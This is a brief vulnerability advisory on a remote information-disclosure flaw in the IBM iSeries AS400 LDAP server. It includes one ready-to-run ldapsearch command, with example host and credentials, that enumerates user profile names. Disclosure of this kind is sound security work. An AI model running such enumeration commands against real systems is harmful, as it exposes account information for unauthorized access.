IBM iSeries AS400 LDAP Server Remote Information Disclosure Vulnerability

IBM iSeries AS400 LDAP Server Remote Information Disclosure Vulnerability

No exploit is required to leverage this issue. To disclose the users names issue the following command using the 'ldapsearch' utility:

ldapsearch -h as400.example.com -b "cn=accounts,os400-sys=S0011223.example.com" -D "os400-profile=SCARMEL,cn=accounts,os400-sys=S0011223.example.com" -w as400Password -L -s sub "os400-profile=LESLIE"